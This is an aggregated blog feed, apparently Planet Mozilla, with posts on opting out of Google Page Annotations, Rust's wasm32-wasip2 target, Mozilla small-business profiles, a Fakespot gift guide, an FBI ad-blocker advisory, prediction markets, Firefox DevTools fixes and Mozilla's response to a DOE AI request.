Anyway, the new one is Google Page Annotations: Google app for iOS now injects links back to Search on websites. I really don’t want this site showing up with links to stuff I didn’t link to. The choices of links on here are my own free expression.

This opt-out has two parts and you do need to have a Google Account to do it.

  1. Either set up Google Search Console and add your site(s) as web properties on there, or go to your existing Google Search Console account and get a list of your web properties.

  2. Visit the form: Opt out from Page Annotation in Google App browser for iOS and add your web properties as a comma-separated list. You have to be the Google Search Console owner of the site(s) to do the opt out.

Hopefully this awkward form thing is just temporary and there will be a more normal opt-out with a meta tag or something at some point. I’ll update this page if they make one.

IMHO the IT business had a peak some time in the mid-2000s. You didn’t have to dink with vintage PC stuff like DIP switches and partition tables, but the Internet companies were still in create more value than you capture mode and you didn’t have to work around too many dark patterns either. If I recall correctly, Microsoft did something like this link-adding scheme in Internet Explorer at one point, but they backed off on it before it really became a thing and the opt-out was easier. Welcome to the return of the power user. Oh well, writing up all the individual opt outs is good for getting clicks. The Google Search algorithm loves tips on how to turn Google stuff off.

Related (more stuff to turn off)

fix Google Search: get rid of most of the AI and other annoying features

Google Chrome ad features checklist: turn off tracking and built-in ads in Google Chrome

Block AI training on a web site Right now you can’t block Google from taking your content for AI without also blocking your site from Google Search, but that’s likely to change.

Bonus links

Why the DOJ’s Google Ad Tech Case Matters to You In 2020, as the UK report cited above showed, publishers received only 51% of the money spent by advertisers to reach readers, and about 15% of advertisers’ money seems to just… disappear.

MFA is Programmatic’s Dark Mirror The failure of MFA is not MFA websites. The failure of MFA is that we built an incentive system in programmatic that essentially necessitated their existence. Related: I was invited to Google HQ to talk about my failing website. Here’s how that went.

The Rust Programming Language BlogThe wasm32-wasip2 Target Has Reached Tier 2 Support

Introduction

In April of this year we posted an update about Rust's WASI targets to the main Rust blog. In it we covered the rename of the wasm32-wasi target to wasm32-wasip1, and the introduction of the new wasm32-wasip2 target as a "tier 3" target. This meant that while the target was available as part of rust-lang/rustc, it was not guaranteed to build. We're pleased to announce that this has changed in Rust 1.82.

For those unfamiliar with WebAssembly (Wasm) components and WASI 0.2, here is a quick, simplified primer:

  • Wasm is a (virtual) instruction format for programs to be compiled into (think: x86).
  • Wasm Components are a container format and type system that wrap Core Wasm instructions into typed, hermetic binaries and libraries (think: ELF).
  • WASI is a reserved namespace for a collection of standardized Wasm component interfaces (think: POSIX header files).

For a more detailed explanation see the WASI 0.2 announcement post on the Bytecode Alliance blog.

What's new?

Starting Rust 1.82 (2024-10-17) the wasm32-wasip2 (WASI 0.2) target has reached tier-2 platform support in the Rust compiler. Among other things this now means it is guaranteed to build, and is now available to install via Rustup using the following command:

rustup target add wasm32-wasip2

Up until now Rust users writing Wasm Components would always have to rely on tools (such as cargo-component) which target the WASI 0.1 target (wasm32-wasip1) and package it into a WASI 0.2 Component via a post-processing step invoked. Now that wasm32-wasip2 is available to everyone via Rustup, tooling can begin to directly target WASI 0.2 without the need for additional post-processing.

What this also means is that ecosystem crates can begin targeting WASI 0.2 directly for platform-specific code. WASI 0.1 did not have support for sockets. Now that we have a stable tier 2 platform available, crate authors should be able to finally start writing WASI-compatible network code. To target WASI 0.2 from Rust, authors can use the following cfg attribute:

#[cfg(all(target_os = "wasi", target_env = "p2"))]
mod wasip2 {
    // items go here
}

To target the older WASI 0.1 target, Rust also accepts target_env = "p1".

Standard Library Support

The WASI 0.2 Rust target reaching tier 2 platform support is in a way just the beginning. means it's supported and stable. While the platform itself is now stable, support in the stdlib for WASI 0.2 APIs is still limited. While the WASI 0.2 specification specifies APIs for example for timers, files, and sockets - if you try and use the stdlib APIs for these today, you'll find they don't yet work.

We expect to gradually extend the Rust stdlib with support for WASI 0.2 APIs throughout the remainder of this year into the next. That work has already started, with rust-lang/rust#129638 adding native support for std::net in Rust 1.83. We expect more of these PRs to land through the remainder of the year.

Though this doesn't need to stop users from using WASI 0.2 today. The stdlib is great because it provides portable abstractions, usually built on top of an operating system's libc or equivalent. If you want to use WASI 0.2 APIs directly today, you can either use the wasi crate directly. Or generate your own WASI bindings from the WASI specification's interface types using wit-bindgen.

Conclusion

The wasm32-wasip2 target is now installable via Rustup. This makes it possible for the Rust compiler to directly compile to the Wasm Components format targeting the WASI 0.2 interfaces. There is now also a way for crates to compile add WASI 0.2 platform support by writing:

#[cfg(all(target_os = "wasi", target_env = "p2"))]
mod wasip2 {}

We're excited for Wasm Components and WASI 0.2 to have reached this milestone within the Rust project, and are excited to see what folks in the community will be building with it!

Frederik BraunModern solutions against cross-site attacks

NB: This is the text/html version of my talk from the German OWASP Day 2024 in Leipzig earlier this month. If you prefer, there is also a video from the event.

Title Slide. Firefox log in the top right. Headline is "Dealing with Cross-Site Attacks". Presentation from Frederik Braun held at German OWASP Day 2024 in Leipzig

This article is about cross-site leak attacks and what recent defenses have been introduced to counter them. I …

The Mozilla BlogHuwa: From a WhatsApp group to sharing Palestinian olive oil with the world

<figcaption class="wp-element-caption">From left: Omar Saleh Huwaoushi, Bilal Othman Huwaoushi and Maryam Othman Huwaoushi. For the family, Huwa is not just a business — it’s a legacy. Credit: Diane Sooyeon Kang</figcaption>

Diane Sooyeon Kang is a food and travel photographer and writer with a passion for storytelling. She has traveled the world extensively, working with esteemed publications and brands. You can find more of her work at dianeskang.com.

A vibrant spread adorns an overflowing table, filled with precious hand-painted ceramics from Palestine, hummus, yogurt dips, za’atar, and fresh tomatoes and mint picked from the backyard garden. Copious amounts of olive oil fill several bowls and are drizzled over nearly every dish. Tucked between the plates are olive oil squeeze bottles adorned with playful illustrations and stickers.

The olive oil, with a surprisingly fruity yet peppery kick, is none other than Huwa, the Huwaoushi family’s newly launched product, made from handpicked, cold-pressed olives straight from a family-owned olive grove.

“We didn’t want to take ourselves too seriously when making the packaging. Olive oil production, especially in Palestine, has never been a purely serious or somber activity,” shares Bilal Othman Huwaoushi, one of three Huwaoushi siblings involved in creating Huwa. “It’s about families coming together — kids playing, aunts and uncles gathering to pick olives.” This sense of joyful community is mirrored in the brand’s design, which includes playful illustrations of birds, a reference to Palestinian symbols, and even comic-style artwork on the inside sleeve.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

For generations, Bilal’s family has been farming olives in Palestine. This deep-rooted tradition is evident in how the family talks about their land, which has produced olives for as long as they can remember. “The same trees we eat from are the ones my grandfather planted as a kid,” Bilal shares, recounting the heritage of their olive groves and the rare, age-old practices that make their olive oil unique.

When Bilal’s father, Omar Saleh Huwaoushi, a retired cab driver, immigrated to Chicago in the 1980s, he missed the flavors of home, especially the olive oil he grew up with. Unable to find anything like it, he started bringing it back with him. “Our family has been growing olives for centuries, but we’re the first generation to bring this olive oil to the U.S.,” Bilal states. Once their friends got a taste of the oil, they wanted it too. And from there, it took on a life of its own.

As a lower-income family, everyone worked together to build the olive oil side business. Before Huwa was created, the Huwaoushis sold their olive oil in 17-liter tanks through a WhatsApp group chat. Feedback was overwhelmingly positive. “People were telling us this was some of the best oil they’d ever tasted,” Bilal recalls. Since the oil came directly from their uncle’s farm, they were able to offer a premium product at a fraction of the price compared to other premium olive oil brands.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Through its popularity in WhatsApp groups, Bilal saw an opportunity, and they decided to brand it as Huwa. It became a passion project to share his Palestinian heritage with a larger audience and create something meaningful with his immediate and extended family, and for the people in his village.

The olive oil is deeply interwoven with the story of their town called Aqraba, a close-knit village where people remain tightly connected even across generations and continents. As Omar shares, “If you mention my name in the village, everyone knows my family. Even after 40 years abroad, returning feels like I never left.” With over 600 family members across multiple generations, the legacy of togetherness is alive and well, both within the family and in their interactions with the community back home.

Their heritage is celebrated each olive harvest season, when family and friends come together to enjoy freshly pressed oil, often with simple dishes like bread soaked in olive oil with onions and sumac. This ritual, as they explain, is not just a meal; it’s an expression of gratitude for the harvest, a way to reconnect with the land and with each other. “In the winter, we’d bake bread, soak it in olive oil, and sprinkle it with sumac and chicken — it’s such a simple meal, but it brings everyone together.”

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Unlike modern olive harvesting practices that often use pesticides, chemical fertilizers, or pest prevention methods like wrapping trees in plastic, Palestinian farmers rely on multi-generational techniques and agricultural wisdom. Farmers plant fig trees within olive groves to naturally attract pests away from the olive trees, and fertilize the soil only with compost and rely solely on rainfall for irrigation — this preserves soil purity and yields high-quality oil.

“The entire production process is very unique — from the way we handle the soil to how we cold-press the oil,” Bilal says. “While many cultures are defined by their food, our culture is unique in that it’s defined by the food process itself.”

To produce most commercial-grade olive oil, large machines typically shake trees, disrupting the birds inhabiting the trees and causing unripened olives, branches and leaves to fall and get processed together. In contrast, Huwa uses a gentler method: Workers lean ladders against the trees and hand-pick only ripe olives, enhancing both oil quality and ecosystem balance. These are indigenous Aqrabawi practices honed over a thousand years of farming.

The community mill used for pressing ensures fair compensation for everyone involved in the harvest. Olives are cold-pressed at low temperatures, preserving nutrients and enhancing flavor.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

For Bilal’s family, Huwa is not just a business — it’s a legacy. Their uncle, deeply respected in the community for his agricultural knowledge, serves as a critical cornerstone and is one of many keepers of this tradition. Preserving culture, heritage and knowledge is central to Huwa’s mission.

In many ways, Huwa represents a bridge: one that connects Palestinian culture with the American community and preserves an ancient tradition in a modern world. As Huwa continues to grow, the family’s goal is to uphold their heritage while inviting others to experience it through the taste of their olive oil. 

“The entire process has been pretty joyful, but there are so many things that have to be done,” Bilal said. “Content and copywriting have been challenging, so using AI tools has been helpful in that regard. I’d much rather spend that time on the street, having people sample our oil.”

Like many entrepreneurs, Bilal has found that with the support of new technology and tools, tasks that were once time-consuming and tedious have become easier and quicker to complete. Yet, despite the workload, the business’s guiding purpose remains unchanged.

“I think the nice thing about working with your family is that sometimes we decide to just hang out and other times we keep going,” Bilal said. “ At the end of the day, the KPI [key performance indicator] for whether we succeed is whether we’re enjoying each other’s company — that’s the guiding principle of how we like to run the business.”


Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out Huwa’s Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post Huwa: From a WhatsApp group to sharing Palestinian olive oil with the world appeared first on The Mozilla Blog.

The Mozilla BlogLa Humita: 20 years of authentic Ecuadorian flavors in Chicago

<figcaption class="wp-element-caption">Nestor Correa founded La Humita in 2003. Later, he hired Chef Juan Esteban, who introduced new dishes focused on Ecuadorian seafood. Credit: Diane Sooyeon Kang </figcaption>

Diane Sooyeon Kang is a food and travel photographer and writer with a passion for storytelling. She has traveled the world extensively, working with esteemed publications and brands. You can find more of her work at dianeskang.com.

When Nestor Correa opened La Humita in Chicago in 2003, he wasn’t just opening a restaurant; he was creating a culinary homage to his family’s heritage and Ecuadorian roots. Named after la humita — a traditional sweet tamale made from ground corn — the restaurant started with recipes passed down through generations, becoming one of the first Ecuadorian restaurants in the city to offer an authentic taste of Ecuador to a diverse audience.

Nestor’s journey into the restaurant world began long before La Humita opened its doors. For over 15 years, he worked as a server at the Marriott Hotel, where he cultivated a deep appreciation for the restaurant industry. “I’ve always had a passion for our cuisine,” Nestor explains. “My mission is to leave something cultural in the city. It’s why I chose to open an Ecuadorian restaurant over other types.” This dedication stems from his childhood, growing up with his mother’s and sister’s homemade recipes that friends and family always praised.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang </figcaption>

La Humita’s initial concept was a high-end dining experience. When it opened in 2003, it quickly gained media attention, appearing in publications like The Chicago Tribune and Chicago Magazine. With a unique menu of Ecuadorian dishes, La Humita quickly became a standout in Chicago’s dining scene, introducing many locals to the richness of Ecuadorian cuisine for the first time. But when the pandemic struck, Nestor faced a major setback. La Humita closed its doors for two years, during which he reevaluated the concept. He attempted to relaunch as La Humita Express, a fast-food version inspired by restaurants like Panda Express, with customizable plates and a simplified approach to serving.

However, this new concept didn’t resonate with his loyal Ecuadorian clientele, who longed for more traditional dishes. “Our community didn’t accept the concept,” Nestor says. “They want specific, traditional dishes.” Realizing that the express concept was not meeting his community’s needs, he restructured the restaurant to honor its original offerings, bringing back traditional plates that felt authentic and comforting. This shift was solidified with the hiring of Juan Esteban, a chef from Quito, Ecuador, who introduced new dishes focused on Ecuadorian seafood, such as shrimp ceviche and the iconic encebollado de pescado (fish soup). “Our chef has brought fresh ideas and traditional flavors,” Nestor shares, crediting this hire with revitalizing La Humita’s menu.

<figcaption class="wp-element-caption">“Our chef has brought fresh ideas and traditional flavors,” Nestor Correa said of Chef Juan Esteban. Credit: Diane Sooyeon Kang </figcaption>

This renewed focus on Ecuadorian authenticity has also allowed La Humita to double down on what sets it apart. “We only serve 100% Ecuadorian cuisine — no Mexican, American or Italian dishes,” Nestor emphasizes. Their approach highlights a distinct culinary identity, one that differentiates Ecuadorian cuisine from other Latin American food, especially with dishes like ceviche, which is boiled instead of cooked in lemon as it’s typically prepared in other countries.

Despite these adaptations, challenges remain, particularly in reaching new customers. “For us, it’s been complicated because our cuisine isn’t as well-known as Italian or Mexican,” Nestor admits. “It’s hard to make Ecuadorian food popular.” Initially, La Humita attracted a mix of local and international patrons, but over the years, its customer base has become primarily Ecuadorian. Now, with a focus on maintaining cultural authenticity, Nestor hopes to regain a wider audience.

One major hurdle to expanding his reach has been the restaurant’s limited digital presence. While they have social media accounts, Nestor acknowledges that without a professional website, they lack visibility. “Many business owners don’t realize how critical a website is,” he says. “But if you don’t have one, or if it’s not up-to-date, you’re missing out. People are looking for information, and not having it can hurt your business.” With this in mind, Correa hopes to build a new website that will better showcase the restaurant’s true identity and give diners a clearer picture of the food and experiences they can expect. Even small changes, like displaying photos of their dishes in the restaurant windows, have made a noticeable difference, drawing in more people from the neighborhood

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

For Nestor, the business is personal. Not only does his family’s legacy influence the menu—his mother’s and sister’s recipes remain unchanged on dishes like la humita and traditional tamales — but his family also plays an active role in the restaurant’s operations. His wife, who is originally from Mexico, learned to cook Ecuadorian food from his mother and sister, and she now works in the kitchen. “We grew up with business in our blood,” Nestor explains. “My wife, my sister, and even my mother, who’s 93, have all helped bring Ecuadorian flavors to life here.”

As Nestor reflects on La Humita’s 20-year journey, he remains steadfast in his commitment to Ecuadorian cuisine. Going digital may help him reach more people, but for Nestor, the heart of La Humita will always be the authenticity and warmth of home-cooked Ecuadorian dishes. And with the support of his family and community, he’s hopeful La Humita will continue to thrive for many years to come.

His vision of sharing Ecuadorian cuisine with Chicago continues to guide him, and he’s excited for what the future holds. “It’s all about sharing my culture through my food,” he says. “Everything we do is a reflection of that.”

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out La Humita’s Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post La Humita: 20 years of authentic Ecuadorian flavors in Chicago appeared first on The Mozilla Blog.

The Mozilla BlogDiaspora: Where Southern, West African and Caribbean traditions come alive in Chicago

<figcaption class="wp-element-caption">Rob Carter is the founder of Diaspora, a progressive Afrocentric food concept that celebrates Southern, West African and Caribbean flavors. Credit: Diane Sooyeon Kang </figcaption>

Diane Sooyeon Kang is a food and travel photographer and writer with a passion for storytelling. She has traveled the world extensively, working with esteemed publications and brands. You can find more of her work at dianeskang.com.

For Rob Carter, founder of Diaspora, food is a bridge to history, identity and community. Inspired by the rich flavors of Southern, West African and Caribbean cuisines, Diaspora brings Rob’s heritage to life through dishes that tell a story. What started as a pop-up in Chicago has become a platform to share his roots, tackle the challenges of entrepreneurship and prove that food has the power to unite people across cultures and generations.

Growing up in a family where food was central to daily life, Rob’s path into the culinary world began at an early age. “My grandmother was my first mentor, even though she didn’t know it,” he recalls fondly. As a child, he often helped her prepare meals that fed large groups; this instilled in him a deep appreciation for hospitality and the ability of food to bring people together. His grandmother lived with 21 siblings and cousins, making her well-suited to cooking for small crowds. Her Southern cooking became the foundation of Rob’s culinary identity.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

While Rob’s early experiences shaped his love for food, becoming an entrepreneur was not without its challenges. Despite years of working in upscale restaurants, including Michelin-starred Vie Restaurant and stages at Band of Bohemia and Blackbird in Chicago, the leap to running his own business was daunting. “You don’t learn business by working the line,” he says. “You learn by doing, making mistakes, and figuring out what works.”

One of the toughest lessons has been the art of timing. Organizing pop-up events — where crowds are unpredictable and profit margins are tight — has proved to be a learning curve. “I once did a pop-up during Lollapalooza weekend, and it was a disaster,” he recalls. “The city was buzzing with festival-goers, and my event was completely overlooked.” These setbacks, however, have helped him refine his approach, teaching him to be more strategic and adapt when necessary.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

In addition to timing, Rob’s journey has highlighted the importance of collaboration. Managing partnerships and navigating last-minute cancellations has been a source of stress. “It’s tough when you rely on other people’s schedules, and then they cancel,” he says, referring to a series of collaborations that fell through in June. Yet, these challenges have only fueled his determination to push forward and remain flexible

Technology has provided a new set of opportunities and challenges. Going digital, especially for a small business with limited resources, can be daunting. But for Rob, the shift is not just about convenience — it’s a way to craft a brand and tell a story. “You have to build a community before you even open your doors,” he shares, describing how Diaspora is leveraging social media to connect with people and create buzz before opening a physical space. The goal is to have a loyal following already in place by the time the doors open, so the business doesn’t have to build momentum from scratch. “People want to know when the space is opening, not when we’re trying to convince them to come. That’s the difference,” he says.

As he continues to grow Diaspora, the chef remains focused on creating meaningful experiences for his guests. Whether through pop-up dinners or catered events, he aims to foster connections and create spaces where people feel part of something special. “It’s about building trust,” he explains. “If people feel like they’re part of something meaningful, they’ll keep coming back.”

Looking to the future, the chef envisions expanding his culinary offerings while also keeping the spirit of collaboration alive. While the idea of a brick-and-mortar restaurant is tempting, the rising costs of rent and food have made him cautious. Instead, he’s focused on continuing to build a strong presence through pop-ups and collaborations before taking the plunge into opening a physical space.

For Rob, this journey is about more than just food; it’s about culture and the connections that can be formed around the table. “I want to create something bigger than just a restaurant,” he says. “It’s about purpose, community and connection.”

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out Diaspora’s Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post Diaspora: Where Southern, West African and Caribbean traditions come alive in Chicago appeared first on The Mozilla Blog.

The Mozilla BlogShopping for everyone? We’ve got you covered with the Fakespot Holiday Gift Guide 2024

Fakespot Holiday Gift Guide Great gifts with reliable reviews for everyone on your list

When it comes to gifting, it’s the thought that counts, right? Then why does it feel so terrible when your creative, thoughtfully chosen gift ends up being a total dud? We’re talking glitching karaoke machines, pepper grinders that dump full peppercorns on your pasta, and doll-sized sweaters that you definitely ordered in a women’s size medium.

The fact is, while online shopping has opened up a world of possibilities for gift-givers, it has also created ample opportunities for scammers and bad actors to sell products that don’t live up to their promises. Throw in some shady ranking tactics and AI-generated reviews and suddenly your simple gift search feels like a research project — or game of whack-a-mole.

This year, the Fakespot Holiday Gift Guide is here to help. It showcases products vetted with Fakespot’s product review analysis technology and helps weed out items with untrustworthy reviews. Whoever you’re shopping for — and whatever their age or interest — this guide will help you find quality products backed by reliable customer feedback.

What makes the Fakespot Holiday Gift Guide 2024 stand out?

The Fakespot Holiday Gift Guide is more than just a list of popular products. It’s a curated selection backed by advanced AI technology designed to analyze reviews and ratings across major e-commerce sites like Amazon, Best Buy and Walmart. Fakespot works to protect shoppers from misleading or fake reviews – a common problem during the holiday rush when online shopping activity spikes. 

Every product featured in the Fakespot Holiday Gift Guide has received a Fakespot Review Grade of an A or B, indicating reliable reviews likely written by real customers who left unbiased feedback.

By filtering out products with untrustworthy reviews, the Fakespot Holiday Gift Guide helps you shop smarter and avoid the disappointments of low-quality or misrepresented items. It’s a practical resource for anyone looking to cut through the holiday noise and make more informed purchases. 

Gift ideas for everyone you love (or just like a lot) with the Fakespot Holiday Gift Guide 2024

The guide spans a wide variety of categories, offering options for every type of person on your gift list. Here’s a look at some of the featured categories:

  1. Tech and electronics
<figcaption class="wp-element-caption">Fakespot Review Grade: B</figcaption>
  1. Fitness and outdoors
<figcaption class="wp-element-caption">Fakespot Review Grade: B</figcaption>
  1. Home and kitchen
<figcaption class="wp-element-caption">Fakespot Review Grade: A</figcaption>
  1. Fashion and beauty
<figcaption class="wp-element-caption">Fakespot Review Grade: B</figcaption>
  1. Toys and games
    • Shopping for kids can be a challenge, especially when reviews don’t tell the whole story about safety or durability. This section brings together exciting and interactive options like classic board games, challenging puzzles and engaging card games for all ages.
<figcaption class="wp-element-caption">Fakespot Review Grade: A</figcaption>

Tips for shopping smart this holiday season

Along with gift recommendations, Fakespot offers valuable tips for making the most of online holiday shopping:

  • Trust but verify: Even highly rated items might have fake reviews. Use tools like Fakespot’s browser extension to double-check reviews while shopping on popular sites.
  • Compare prices: The holiday season can bring fluctuating prices. Keep an eye on price trends and consider setting up alerts for big-ticket items.
  • Look beyond ratings: Sometimes a product might have high ratings, but lack detailed, verified reviews. Focus on the authenticity of reviews rather than just on the star rating.

Wrapping up your holiday shopping with confidence

With its carefully selected products and commitment to transparency, the Fakespot Holiday Gift Guide provides an invaluable resource for holiday shoppers. Head over to the Fakespot Holiday Gift Guide and cross “perfect gifts” off your to-do list.

A check mark next to the text "Fakespot."

Shop smarter with reliable product reviews for everyone on your list

Check out the Fakespot Holiday Gift Guide

The post Shopping for everyone? We’ve got you covered with the Fakespot Holiday Gift Guide 2024 appeared first on The Mozilla Blog.

Don MartiUse an ad blocking extension when performing Internet searches

The FBI seems to have taken down the public service announcement covered in Even the FBI says you should use an ad blocker | TechCrunch.

Use an ad blocking extension when performing internet searches. Most internet browsers allow a user to add extensions, including extensions that block advertisements. These ad blockers can be turned on and off within a browser to permit advertisements on certain websites while blocking advertisements on others.

This is still good advice. Search ads are full of scams, and you can block ads on search without blocking the ads on legit sites. I made a local copy of the FBI alert.

Why did they take the web version down? Maybe we’ll find out. I sent the FBI a FOIA request for any correspondence about this alert and the decision to remove it.

The Malwarebytes site has more good info on ongoing problems with search ads. Google Search user interface: A/B testing shows security concerns remain

Related

effective privacy tips

SingleFile is a convenient extension for saving copies of pages. (I got the FBI page from the Internet Archive. It’s a US government work so make all the copies you want.)

Bonus links

“Interpreting the Ambiguities of Section 230” by Alan Rozenshtein (Section 230 covers publisher liability, but not distributor liability.)

Confidential OCR (How to install and use Tesseract locally on Linux)

The Great Bluesky Migration: I Answer (Some) Of Your Questions Bluesky also offers a remedy for quote-dunking. If someone quotes your post to make a nasty comment on it, you can detach the quoted post entirely. (And then you should block the jerk). Related: Bluesky’s success is a rejection of big tech’s operating system

Designing a push life in a pull world Everything in our online world is designed to push through our boundaries, usually because it’s in someone else’s financial best interest. And we’ve all just accepted that this is the way the world works now.

Killer Robots About to Fill Skies… (this kind of thing is why the EU doesn’t care about AI innovation in creepy tracking and copyright infringement—they need those developers to get jobs in the defense industry, which isn’t held back by the AI Act.)

Inside the Bitter Battle Between Starbucks and Its Workers (More news from management putting dogmatic union-busting ahead of customers and shareholders, should be a familiar story to anyone dealing with inadequate ad review or search quality ratings.)

National Public Data saga illustrates little-regulated US data broker industry National Public Data appears to have been a home-based operation run by Verini himself. The enterprise maintains no dedicated physical offices. The owner/operator maintains the operations of company from his home office, and all infrastructure is housed in independent data centers, Verini said in his bankruptcy filing.

Cameron KaiserCHRP removal shouldn't affect Linux Power Macs

A recent patch removed support for the PowerPC Common Hardware Reference Platform from the Linux kernel. However, Power Macs, even New World systems, were never "pure" CHRP, and there were very few true CHRP systems ever made (Amiga users may encounter the Pegasos and Pegasos II, but few others existed, even from IBM). While Mac OS 8 had some support for CHRP, New World Macs are a combination of CHRP and PReP (the earlier standard), and the patch specifically states that it should not regress Apple hardware. That said, if you're not running MacOS or Mac OS X, you may be better served by one of the BSDs — I always recommend NetBSD, my personal preference — or maybe even think about MorphOS, if you're willing to buy a license and have supported hardware.

Don Martiprediction markets and the 2024 election link dump

Eric Neyman writes, in Seven lessons I didn’t learn from election day, Many people saw the WSJ report as a vindication of prediction markets. But the neighbor method of polling hasn’t worked elsewhere. More: Polling by asking people about their neighbors: When does this work? Should people be doing more of it? And the connection to that French dude who bet on Trump

The money is flooding in, but what are prediction markets truly telling us? If we look back further, predicted election markets were actually legal in the US from the 1800s to 1924, and historical data shows that they were accurate. There’s a New York Times story of Andrew Carnegie noting how surprisingly accurate the election betting markets were at predicting outcomes. They were actually more accurate before the introduction of polling as a concept, which implies that the introduction of polling diluted the accuracy of the market, rather than the opposite.

Was the Polymarket Trump whale smart or lucky? Whether one trader’s private polling tapped sentiment more accurately than the publicly available surveys, or whether statistical noise just happened to reinforce his confidence to buy a dollar for 40c, can’t be known without seeing the data.

Koleman Strumpf Interview - Prediction Markets & More 2024 was a huge vindication for the markets. I don’t know how else to say it, but all the polls and prognosticators were left in the dust. Nobody came close to the markets. They weren’t perfect, but they were an awful lot better than anything else, to say the least.

FBI raids Polymarket CEO Shayne Coplan’s apartment, seizes phone: source Though U.S. election betting is newly legal in some circumstances, Polymarket is not supposed to allow U.S. users after the Commodity Futures Trading Commission halted its operations in 2022, but its user base largely operates through cryptocurrency, which allows for easy anonymity.

Polymarket Explained: How Blockchain Prediction Markets Are Shaping the Future of Forecasting (Details of how Polymarket works including tokens and smart contracts.)

Betting odds called the 2024 election better than polls did. What does this mean for the future of prediction markets?

Prediction Markets for the Win

Just betting on an election every few years is not the interesting part, though. Info Finance is a broader concept. [I]nfo finance is a discipline where you (i) start from a fact that you want to know, and then (ii) deliberately design a market to optimally elicit that information from market participants.

Bonus links

The rise and fall of peer review - by Adam Mastroianni

The Great Redbox Cleanup: One Company is Hauling Away America’s Last DVD Kiosks

Both Democrats and Republicans can pass the Ideological Turing Test

The Verge Editor-In-Chief Nilay Patel breathes fire on Elon Musk and Donald Trump’s Big Tech enablers

2024-11-09 iron mountain atomic storage

How Upside-Down Models Revolutionized Architecture, Making Possible St. Paul’s Cathedral, Sagrada Família & More

Firefox Developer ExperienceFirefox DevTools Newsletter — 132

Developer Tools help developers write and debug websites on Firefox. This newsletter gives an overview of the work we’ve done as part of the Firefox 132 Nightly release cycle.

Want to help? DevTools are written in HTML, CSS and JS so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues

Firefox 133 is around the corner and I’m late to tell you about what was done in 132! This release does not offer any new features as the team is working on bigger tasks that are still not visible by the users. But this still contains a handful of important bug fixes, so let’s jump right in.

Offline mode and cached requests

When enabling Offline mode from the Network panel, cached requests would fail, which doesn’t match the actual behavior of the browser when there is no network (#1907304). This is fixed now and cached requests will succeed as you’d expect.

Inactive CSS and pseudo elements

You might be familiar with what we call Inactive CSS in the Inspector: small hints on declarations that don’t have any impact on the selected element as the property requires other properties to be set (for example, setting top on non-positioned element). Sometimes we would show invalid hints on pseudo-element rules displayed in their binding elements (i.e. the one that we show under the “Pseudo element” section), and so we fixed this to avoid any confusion (#1583641).

Stable device detection on about:debugging

In order to debug Firefox for Android, you can go to about:debugging , plug your phone through USB and inspect the tabs you have opened on your phone. Unfortunately the device detection was a bit flaky and it could happen that the device wouldn’t show up in the list of connected phones. After some investigation, we found out the culprit (adb is now grouping device status notifications in a single message), and device detection should be more stable (#1899330).

Service Workers console logs

Still in about:debugging, we introduced a regression a couple releases ago which would prevent any Service Workers console logs to be displayed in the console. The issue was fixed and we added automated tests to prevent regressing such an important features (#1921384, #1923648)

Keyboard navigation

We tackled a few accessibility problems: in the Network panel, “Raw” toggles couldn’t be checked with the keyboard (#1917296), and the inspector filter input clear button couldn’t be focused with the keyboard (#1921001).

Misc

Finally, we fixed an issue where you couldn’t use the element picker after a canceled navigation from about:newtab (#1914863), as well as a pretty nasty Debugger crash that could happen when debugging userscript code (#1916086).

And that’s it for this months folks, Thank you for reading this and using our tools, see you in a few weeks days for a new round of updates 🙂


Full list of fixed bugs in DevTools for the Firefox 132 release:

Mozilla Privacy BlogMozilla Responds to DOE’s RFI on the Frontiers in AI for Science, Security, and Technology (FASST)

This month, the US Department of Energy’s (DOE)  released a Request for Information on their Frontiers in Artificial Intelligence for Science, Security, and Technology (FASST) initiative. Mozilla was eager to provide feedback, particularly given our recent focus on the emerging conversation around Public AI.

The Department of Energy’s (DOE’s) FASST initiative has the potential to create the foundation for Public AI infrastructure, which will not only help to enable increased access to critical technologies within the government that can be leveraged to create more efficient and useful services, but also potentially catalyze non-governmental innovation.

In addressing DOE’s questions outlined in the RFI, Mozilla focused on key themes including the myriad benefits of open source, the need to keep competition related to the whole AI stack top of mind, and the opportunity or FASST to help lead the development of Public AI by creating the program as “public” by default.

 

Below, we set out ideas in more depth. Mozilla’s response to DOE in full can be found here.

  • Benefits of Open Source: Given Mozilla’s long standing support of the open source community, a clear through line in Mozilla’s responses to DOE’s questions is the importance of open source in advancing key government objectives. Below are four key themes related to the benefits of open source:
    • Economic Security: Open source by its nature enables the more rapid proliferation of a technology and according to NTIA’s report on Dual-Use Foundation Models with Widely Available Model Weights, “They diversify and expand the array of actors, including less resourced actors, that participate in AI research and development.” For the United States, whose competitive advantage in global competition is its innovative private sector, the rapid proliferation of newly accessible technologies means that new businesses can be created on the back of a new technology, speeding innovation. Existing businesses, whether a hospital or a factory, can more easily adopt new technologies as well, helping to increase efficiency.
